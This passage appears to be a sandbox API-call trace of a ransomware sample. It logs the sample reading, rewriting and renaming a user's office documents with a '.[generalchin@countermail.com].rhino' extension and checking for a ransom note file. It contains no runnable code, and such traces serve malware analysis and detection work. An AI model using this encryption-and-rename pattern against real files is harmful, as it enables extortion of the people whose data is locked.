RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b50b0 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b50b0 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b50b0 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b65f0 [0106.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b50b0 | out: hHeap=0x6d0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23f16b8 [0106.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b65f0 | out: hHeap=0x6d0000) returned 1 [0106.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23b50b0 [0106.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.923] WriteFile (in: hFile=0x110, lpBuffer=0x23b50c0*, nNumberOfBytesToWrite=0x311c, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23b50c0*, lpNumberOfBytesWritten=0x292f304*=0x311c, lpOverlapped=0x0) returned 1 [0106.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b50b0 | out: hHeap=0x6d0000) returned 1 [0106.924] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x311c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.924] CloseHandle (hObject=0x110) returned 1 [0106.927] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3998 [0106.927] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x7148e0 [0106.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3998 | out: hHeap=0x6d0000) returned 1 [0106.927] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\MY5h2w Zql7liGw mDEf.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\my5h2w zql7ligw mdef.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\MY5h2w Zql7liGw mDEf.odp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\my5h2w zql7ligw mdef.odp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79ff30 [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79feb8 | out: hHeap=0x6d0000) returned 1 [0106.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79feb8 [0106.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x712898 [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79feb8 | out: hHeap=0x6d0000) returned 1 [0106.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\nPBObvG51sSTj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\npbobvg51sstj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.929] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xd0cb [0106.929] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd1eb, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.929] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.929] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.930] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.930] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0xd0cb, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0xd0cb, lpOverlapped=0x0) returned 1 [0106.931] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0106.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.931] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0106.931] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0106.931] GetLastError () returned 0x0 [0106.931] SetLastError (dwErrCode=0x0) [0106.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.931] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0ee) returned 0x23ff070 [0106.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.933] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0106.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0106.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f70 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0106.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b2088 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b2088 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b35c8 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b5590 [0106.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b35c8 | out: hHeap=0x6d0000) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0106.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5590 | out: hHeap=0x6d0000) returned 1 [0106.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0106.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x240c168 [0106.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.937] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0106.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240c168 | out: hHeap=0x6d0000) returned 1 [0106.940] WriteFile (in: hFile=0x110, lpBuffer=0x24c0060*, nNumberOfBytesToWrite=0xd1eb, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24c0060*, lpNumberOfBytesWritten=0x292f304*=0xd1eb, lpOverlapped=0x0) returned 1 [0106.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0106.940] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd1eb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.940] CloseHandle (hObject=0x110) returned 1 [0106.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7148e0 [0106.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f1e8 [0106.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.942] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\nPBObvG51sSTj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\npbobvg51sstj.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\nPBObvG51sSTj.ods.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\npbobvg51sstj.ods.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f1e8 | out: hHeap=0x6d0000) returned 1 [0106.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0106.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79feb8 [0106.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79ff30 | out: hHeap=0x6d0000) returned 1 [0106.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79ff30 [0106.945] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x712898 [0106.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79ff30 | out: hHeap=0x6d0000) returned 1 [0106.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\03g4_AE.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\03g4_ae.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.946] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x25c6 [0106.946] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x26e6, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.946] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.946] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.947] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.947] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x25c6, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x25c6, lpOverlapped=0x0) returned 1 [0106.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0106.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0106.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0106.947] GetLastError () returned 0x0 [0106.947] SetLastError (dwErrCode=0x0) [0106.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x25e9) returned 0x23b2088 [0106.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.948] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0106.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0106.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0106.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f70 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0106.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b4680 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4680 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b4680 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b5bc0 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4680 | out: hHeap=0x6d0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b7b88 [0106.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5bc0 | out: hHeap=0x6d0000) returned 1 [0106.950] WriteFile (in: hFile=0x110, lpBuffer=0x23b7ba0*, nNumberOfBytesToWrite=0x26e6, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23b7ba0*, lpNumberOfBytesWritten=0x292f304*=0x26e6, lpOverlapped=0x0) returned 1 [0106.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b7b88 | out: hHeap=0x6d0000) returned 1 [0106.951] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x26e6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.951] CloseHandle (hObject=0x110) returned 1 [0106.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7148e0 [0106.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f1e8 [0106.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.952] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\03g4_AE.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\03g4_ae.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 